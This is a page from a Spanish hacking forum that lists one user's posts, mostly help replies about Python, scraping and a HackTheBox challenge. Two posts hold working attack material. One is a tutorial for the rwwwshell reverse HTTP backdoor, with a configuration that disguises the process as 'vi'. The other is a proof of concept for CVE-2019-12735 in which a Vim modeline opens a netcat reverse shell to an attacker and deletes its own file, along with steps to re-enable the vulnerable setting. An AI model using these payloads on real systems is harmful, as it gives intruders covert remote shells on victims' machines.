Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - DtxdF

Páginas 1 ... 49 50 51 52 53 ... 66
#1001
Dudas y pedidos generales / Re:como evitar accesos indevidos
Julio 11, 2019, 02:20:52 PM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola, sabes la dirección de origen?, Si la sabes haz hecho algún escaneo o sacado información como la "ubicación" (lo digo por si acaso quieres llevar esto a un asunto más grande o para verificar que no sea un conocido).

Está atento por si tienes un virus que te está acechando la red.

Sobre la lista blanca (White list), la mayoría de router's, tienen esta opción es cuestión de que busques dependiendo del router y el modelo.

Si el router no te permite esta característica, usa un lenguaje que te permita bloquear el acceso (Como PHP, detectas la IP y si lo deseas no le muestras el contenido)

Espero haberte ayudado y espero que alguien más aporte tu inconveniente.

- DtxdF

#1002
Dudas y pedidos generales / Re:Password de Access Token
Julio 11, 2019, 12:32:53 AM
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, no es necesario que abras un post con el mismo problema, pero te respondo igualmente.

Aquí "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login" encontrarás un vídeo de como configurarlo, donde también menciona en donde puedes cambiar la contraseña en caso de pérdida.

Busca en la página oficial haber si te pueden solventar tu problema.
#1003
Dudas y pedidos generales / Re:Cryptografia
Julio 10, 2019, 06:53:58 AM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Puedes encontrarte un codigo tan sofisticado como no, no soy un experto en el tema, me falta mucha experiencia en esto, pero si no me equivoco todo está en los números primos, así que depende de como genere los números primos el código que te encuentres y la longitud (Por supuesto, más grande los números mas poder de cómputo, menos grande menos poder de cómputo).

Como dije no soy un experto, si alguien pudiera aportar, encantado.

- DtxdF
#1004
Dudas y pedidos generales / Re:[SOLUCIONADO] Urge Servicio de Lanzador de Xploit para:
Julio 10, 2019, 06:48:48 AM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Estoy super de acuerdo contigo pero la verdad me gustaria de alguien se me pudiera enseñar paso a paso de como realizarlas y de la manera que quiero realizarlas muy automatico como la que era esa pagina que menciono


Con la programación automatizarias una tarea, no creas que vas a aprender de la noche a la mañana (Aunque puede ser posible). Si lo que te interesa es una "Herramienta", puedes encontrarla, hasta con el problema en Youtube puedes hacerlo, pero deberías aprovechar; Aunque no te límites internet es amplia no sólo existe YouTube, como proceso de aprendizaje y además aún siguen habiendo tutoriales de cómo hacerlo manualmente para que aprendas.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Estoy super de acuerdo contigo pero la verdad me gustaria de alguien se me pudiera enseñar paso a paso de como realizarlas y de la manera que quiero realizarlas muy automatico como la que era esa pagina que menciono

En internet hay miles de tutoriales sobre el tema.

También te aconsejo mirar sobre los temas de legalidad relacionados y lo que puede suponer este tipo de delitos.

Estoy completamente de acuerdo con @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, si no tienes cuidado serás penalizado dependiendo del país y sin importar tu edad; Me refiero a que no le hagas daño, sólo aprende en entornos controlados.

- DtxdF
#1005
Dudas y pedidos generales / Re:[Ayuda] Guardar en un TXT
Julio 09, 2019, 10:57:34 PM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Sencillo compañero, con la función "open()". Su uso es simple: open("Archivo", "modo"), se generan atributos dependiendo del modo, ejemplo: si eliges abrir un archivo y leerlo open("Archivo", "r").read() (Date cuenta del atributo que uso ".read()", entre paréntesis del atributo, incluyes el tamaño de bytes a leer), para leer un archivo binario usas el modo "<modo>b" (Solo le agregas la b, ejemplo: open("Archivo", "rb").read()).

Hay más modos, ejemplo:

* - open("Archivo", "w").write("Contenido");open("Archivo", "wb").write("Contenido binario") # Generalmente se usa el "w/wb" aunque no escribas caracteres irreconocibles.
* - open("Archivo", "r").read();open("Archivo", "rb").read()
* - open("Archivo", "a").write("Contenido");open("Archivo", "ab").write("Contenido") # Con este modo puedes escribir archivos así no existan, y si ya existen escribe con el contenido que tiene el archivo. Ejemplo: Si en el archivo "test.txt" tiene de contenido "Hola!", entonces con este modo escribiremos ademas de "Hola!\n", tambien "Hola2!", quedando:

Código: text

Hola!
Hola2!


A diferencia de este modo (a, ab) y (w, wb), es que "wb" sobre-escribe, este no!.

* - Otro cosa a mencionar es que si agregas el "+" a un modo (ejemplo "ab+"), tendras para hacer dos posibilidades de un modo. Ejemplo si yo coloco "w+" tendré la posibilidad de escribir un archivo y leerlo, pero si en tal caso de existir contenido lo sobre-escribire, inténtalo con "a+" y usa los atributos ".read()" y ".write()" para que veas con tus propios ojos el funcionamiento.

Tu ejercicio sera practicar el guardar lo que deseas. Una ayuda extra que te proporciono es que uses str() para almacenar un número (En tal caso que desees almacenar la variable security de tu script).
#1006
Dudas y pedidos generales / Re:Urge Servicio de Lanzador de Xploit para:
Julio 09, 2019, 05:00:48 PM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Deja de usar esos servicios o parecidos, aprende sobre phishing e ingeniería social ya que es lo que tratan esos servicios.

Crea tus propias herramientas en vez de usar las de otros. Lee sobre php, HTML, css y Javascript.
#1007
Dudas y pedidos generales / Re:Infectar wifi
Julio 09, 2019, 04:54:11 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Bueno ya te di la respuesta a tu pregunta, pero ahora me dejas una a mi ... "que harás?"

- DtxdF
jajajaja, mi idea es poner un minero en la red que se ejecute cuando se conecten, mi otra idea es buscar algún rat o algo parecido que infecte por usb y que el minero se vaya descargando de esa forma. Que opinas?

Ya eso es para el otro post que creaste, sólo espero que tú conocimiento no lo uses para un mal.

- DtxdF
#1008
Dudas y pedidos generales / Re:Infectar wifi
Julio 09, 2019, 11:47:52 AM
Bueno ya te di la respuesta a tu pregunta, pero ahora me dejas una a mi ... "que harás?"

- DtxdF
#1009
Dudas y pedidos generales / Re:RED!!!
Julio 08, 2019, 11:40:19 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas, alguien podría orientarme sobre si es posible y como se podría infectar una red wifi y cuando se conecten en diche red se ejecute el regalito??? Gracias!

Hola, Sabes que son sockets?, haz usado exploit's? (No me refiero a un framework o un programa que te haga todo el trabajo me refiero si literalmente comprendes porque es vulnerable un sistema a cause de ejecutar ese código), Haz programado?, Sabes por lo menos los conceptos y funcionamiento teórico de por lo menos los protocolos más usados?.

Si haz hecho por lo menos la parte de la programación puede darte una idea de como hacerlo y claro saber de redes y protocolos para la comunicación y los exploit's para ver si puedes acceder a un sistema remotamente.

- DtxdF
#1010
Dudas y pedidos generales / Re:[Ayuda] ¿Alguien podría explicarme esto?
Julio 06, 2019, 05:12:00 PM
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, si tu carga útil (Payload) fue una shell inversa entonces ejecutaras solo comandos de esa shell, ejemplo: "La shell de mi victima es /bin/sh", a cambio si tu carga útil fue un meterpreter hay si ejecutaras comandos de meterpreter e incluso podrás obtener una shell remota.

Para salir de mis dudas si en tal caso no solucione tu problema dime cual es la carga util que estas utilizando.
#1011
Hacking / rwwwshell: Reviendo la infancia con Mr. Robot
Julio 06, 2019, 11:55:31 AM


rwwwshell (Reverse WWW Shell Tunnel):

Recuerdas el episodio cuando eliot deja una puerta trasera en Evil Corp pero luego tenia que desactivarla?

Para lograr esto se conecta a la maquina infectada de Evil Corp y procede a limpiar sus huellas usando el comando SHRED

Tutorial de rwwwshell:

Lo que más me costo encontrar es información acerca de esta herramienta, espero que a ustedes no le pase lo mismo. Ahora vayamos directo al grano.

Para usar rwwshell tendremos que descargarla o mejor dicho clonarla:

Código: text

git clone https://github.com/DtxdF/rwwwshell.git


Accedemos al directorio y ejecutamos:

Código: text

cd rwwwshell
perl rwwwshell-2.0.pl


Código: text
Nos aparecerá un poco de información y algo llamado "modos":




Estos modos definen básicamente quien seras en este juego, un "master" (El atacante) o un "slave" (Una victima),
Antes de ejecutar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login vamos a configurarlo:

Código: text

vim rwwwshell-2.0.pl # Lo abrimos con nuestro editor preferido
# Si nos dirigimos a la linea 24 nos damos cuenta de que aqui comienza la configuración y en la linea 53 termina!
# En mi caso yo solo configurare dos variables
$LISTEN_PORT=8080; # El puerto en escucha en caso de ser un master y para conectar en caso de ser un slave
$SERVER="127.0.0.1"; # El host que estara en escucha en caso de ser un master y el host a conectar en caso de ser un slave


Archivo de configuración completo:

Código: text

#
# GENERAL CONFIG (except for $MASK, everything must be the same
#                 for MASTER and SLAVE is this section!)
#
$MODE="POST";                    # GET or POST
$CGI_PREFIX="/cgi-bin/orderform";# should look like a valid cgi.
$MASK="vi";                      # for masking the program's process name
$PASSWORD="THC";                 # anything, nothing you have to rememeber
                                 # (not a real "password" anyway)
#
# MASTER CONFIG (specific for the MASTER)
#
$LISTEN_PORT=8080;      # on which port to listen (80 [needs root] or 8080)
$SERVER="127.0.0.1";    # the host to run on (ip/dns) (the SLAVE needs this!)

#
# SLAVE CONFIG (specific for the SLAVE)
#
$SHELL="/bin/sh -i";    # program to execute (e.g. /bin/sh)
$DELAY="3";             # time to wait for output after your command(s)
#$TIME="14:39";         # time when to connect to the master (unset if now)
#$DAILY="yes";          # tries to connect once daily if set with something
#$PROXY="127.0.0.1";    # set this with the Proxy if you must use one
#$PROXY_PORT="3128";    # set this with the Proxy Port if you must use one
#$PROXY_USER="user";    # username for proxy authentication
#$PROXY_PASSWORD="pass";# password for proxy authentication
#$DEBUG="yes";          # for debugging purpose, turn off when in production
$BROKEN_RECV="yes";     # For AIX & OpenBSD, NOT for Linux & Solaris

# END OF CONFIG         # nothing for you to do after this point #


Probando y ejecutando estilo eliot:

Código: text

perl rwwwshell-2.0.pl master # Esperamos a que se conecte la victima


Código: text

perl rwwwshell-2.0.pl slave # La victima se conecta a la maquina atacante




*Algo que no hace eliot es eliminar la puerta trasera usando el comando shred, lo que hace es cifrarlo el número de veces que le pasemos como argumento, para hacer esto tendremos que pasarle el siguiente parámetro "-u"*

- DtxdF
#1012
Dudas y pedidos generales / Re:[DUDA] Ayuda con un reto en HackTheBox
Julio 06, 2019, 12:15:36 AM
Hola, muchas gracias por responder y por la ayuda que me proporcionas pero lamentablemente sigo sin tener un resultado satisfactorio, siento que me estan trolleando o que la respuesta esta hay básicamente pero no, sigo ciego sin poder verla.

Probé todo lo que se me ocurre y sigo pensando que puedo estar pasando por alto, Igualmente muchas gracias por tu ayuda  ;D
#1013
Dudas y pedidos generales / [DUDA] Ayuda con un reto en HackTheBox
Julio 05, 2019, 03:38:19 PM
Hola, como les va a todos?

Acabo de registrarme en "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login" y de una vez estoy realizando un reto que consiste en que hashee (a MD5) el string proporcionado por la página lo mas rápido que pueda.

Lo hago rápidamente pero no es suficiente, pienso que como el string está codificado base64, no me da el resultado correcto cuando lo hasheo, así que lo descodifico y vuelvo a hashearlo pero tampoco es suficiente, así que decido crear un bot que busque el string y haga lo mismo que hice anteriormente pero tampoco es suficiente.

Este es la página del reto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Necesito ayuda es que me orienten ya que quiero aprender, muchas gracias :D

EDITO:

Disculpen por no haber presentado una imagen, pense que ya era suficiente con el link pero me di cuenta de que es dinamico, aqui les dejo una imagen:

#1014
Dudas y pedidos generales / Re:Scrapy
Julio 02, 2019, 07:29:55 AM
Hola, @lemos.ema, como te lo explican en "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login", es mejor utilizar "BeautifulSoup", no solo porque sea mucho más eficiente sino porque puedes comprender "desde cero" como hacer un scraper

Sobre el algoritmo que deseas crear:

Citar
Hola que tal todos como estan?
estoy a full con el tema del scrapy y queria saber que tan real puede ser crean un scraper que capte info en el momento con ayuda de machine learning ?
por ahi con un ejemplo queda mas claro, imaginen poder crear un algoritmo de machine learning que permita detectar todas las personas que estan hablando de tal tema (ejemplo futbol) en la red. Y que por ejemplo si un usuario lo publica en facebook me llegue una notificacion con su nombre. Se me ocurre que podria ser con Selenium... pero el change de pagina tardaria mucho por lo que no me avisaria en el momento.
gracias

Lo que deseas crear es un "shodan" solo que para saber que hacen las personas en la red de redes, puedes hacerlo solo estudia esos temas y escucha las oportunidades que te están dando las personas (Me refiero al anterior POST)
#1015
Dudas y pedidos generales / Re:Enviar formulario con dropzone vacío
Junio 15, 2019, 06:40:41 PM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola, como dice @aminanegra, te refieres a una pagina web? y una pregunta, es tu pagina web?, me refiero tienes el codigo del formulario?.

Si es tu pagina web dejanos tu codigo para poder ayudarte, si puedes incluir una captura de pantalla sera más facil ayudarte.

Si no es tu pagina web, envianos igualmente una captura de pantalla, aunque generalmente estas paginas web tienen un atributo "required" o antes de ser enviadas son verificadas por javascript o en la recepción son verificadas en el servidor.
#1016
Dudas y pedidos generales / Re:Ayuda Script Python
Junio 14, 2019, 01:20:38 AM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Por lo que puedo ver, no haces la petición y tampoco ejecutas la función "write", la única función que se ejecuta es "create_account" y dentro de esta no se ejecuta ni se crea una variable "response", si te das cuenta en la función "write" verificas que un string lo contenga otro string "que en este caso viene siendo la respuesta del servidor", si ejecutaras la función dentro de otra te daría una excepción.
#1017
Dudas y pedidos generales / Re:busco a alguien que me enseñe a programar en python
Junio 12, 2019, 08:09:32 PM
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, lo primero que te voy a decir te puede causar una decepción porque posiblemente no es la respuesta que buscabas, pero si quieres saber infinidad de cosas en esta disciplina no necesitas a una persona que te ayude, puede que te oriente pero no que te ayude de la manera que deseas, a lo que me refiero es que en esta disciplina necesitas ser autodidacta, escuchar de personas que saben, etc; Si deseas aprender de python o un lenguaje, tecnología o cualquier cosa relacionada a la informática es mejor que leas y mucho, recomiendo que leas libros extensos sobre estos, uses aplicaciones y aprendas como funcionan esas aplicaciones, leas código de otras personas y si quieres un toque de reto lee código espagueti aunque en python poco lo veo, aunque si, es posible.

Espero haberte orientado ...
#1018
Hacking / Como hackear Linux con un archivo de texto (.txt)
Junio 11, 2019, 09:34:05 PM
Nueva vulnerabilidad en "Vim" y "Neovim" permite la ejecución de comandos



No hace mucho el investigador Armin Razmjou descubrio un fallo que hace vulnerable a cualquier Linux que cuente con el famoso y querido editor de texto "Vim" y su Fork "Neovim", Vulnerabilidad registrada como CVE-2019-12735.

Pero ... ¿Que es Vim?

Vim, por sus siglas en Ingles "Vi improved" es una versión mejorada del editor de texto vi, presente en todos los sistemas UNIX. Su autor, Bram Moolenaar, presentó la primera versión en 1991, fecha desde la que ha experimentado muchas mejoras.

Vulnerabilidad

Este fallo es debido a una caracteristica llamada "modelines", que basicamente le permite al editor de texto (Incluyendo Neovim) cargar desde cualquier fichero una configuración personalizada.

Esta caracteristica viene habilitada por defecto en estos editores, caracteristica que si el usuario lo desea la puede desactivar, el problema yace es que la mayoria de usuarios no lo hacen, ocasionando un posible control total a un atacante.

Como apoda el titulo de este articulo con un simple archivo de texto con un modeline especifico y simple es posible conseguir ejecutar codigo directamente en la memoria del sistema. Aunque Vim y Neovim pueden ejecutar los comandos peligrosos dentro de un sandbox, al utilizar "source" en la linea del codigo se consigue salir de este aislamiento.

Prueba de Concepto

En este articulo no solo quiero tocar teoria, tambien practica, para eso solo crearemos un fichero de texto llamado "poc.txt" (Para este ejemplo), donde contendra el siguiente codigo modificado de "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login" para conseguir el control del sistema remotamente o lo que se podria simplificar como una shell remota con una conexión inversa utilizando la navaja suiza "Netcat":

Código: text
:!nohup nc <ip> <puerto> -e <shell> >> /tmp/nohup.dat 2>> /tmp/nohup.dat & rm <nombre del archivo> >> /tmp/nohup.dat 2>> /tmp/nohup.dat||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="


Ejemplo

Código: text
:!nohup nc 127.0.0.1 4444 -e /bin/sh >> /tmp/nohup.dat 2>> /tmp/nohup.dat & rm poc.txt >> /tmp/nohup.dat 2>> /tmp/nohup.dat||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="


Claro ya tenemos que tener a netcat a la escucha:

Código: text
nc -vlp 4444


Una vez conectado podremos ejecutar comandos remotamente:

Código: text

root@dtxdf ~# nc -vlp 9999
listening on [any] 9999 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 42730
whoami
root




Parches y soluciones

Si ya ibas a lanzar la computadora por la ventana, tranquila/o ya los responsables de Vim y Neovim lanzaron sus parches para corregir las vulnerabilidades originadas por estos mismos con el fin de que sigamos usando estos increibles editores. En el caso de Vim, el parche que lo protege es el "8.1.1365", y en Neovim es la versión "0.3.6".

¿Vim y Neovim no son vulnerables?, vamos a vulnerarlos!

Si en este caso no son vulnerables, pero deseas realizar la prueba de concepto, lo puedes lograr desde el archivo de configuracion de Vim, mayormente ubicado en: '/etc/vim/vimrc', aunque primero verifiquemos ejecutando la siguiente sentencia con Vim ya abierto:

Código: text

# Presionamos ":" y colocamos set modeline?
# Si nos retorna "modeline" es porque somos vulnerables a este ataque y si no, nos retornaria "nomodeline"
# Y si quiero cambiarlo a "modeline" en caso de que nos retorne "modeline", colocamos el siguiente codigo en el archivo de ćonfiguracion de Vim "/etc/vim/vimrc"
# set modeline
# Y para ver si la prueba es exitosa, realiza el POC y me dices que tal ...


¿Dudas?, comentamelo o hazme saber si quieres más articulos de noticias recien sacadas del horno

Referencias:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- DtxdF
#1019
Hacking / Re:Winp: Una botnet desde tu casa!
Junio 11, 2019, 11:21:14 AM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Excelente aporte !! Vere si me hago un tiempito para probarlo :D

Gracias, pruébalo y me cuentas ...  ;D

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Se ve muy interesante y sencillo de aprender,

Muchas gracias, esperaré el siguiente tutorial más detallado :P!

Saludos!

Ya lo hice compañero, "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login", no es un manual pero si explica mucho
#1020
Hacking / Re:Winp: Una botnet desde tu casa!
Junio 11, 2019, 12:36:07 AM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Gracias, tranqui tarde o temprano encontrare la respuesta, pero igualmente muchas gracias por intentarlo
Páginas 1 ... 49 50 51 52 53 ... 66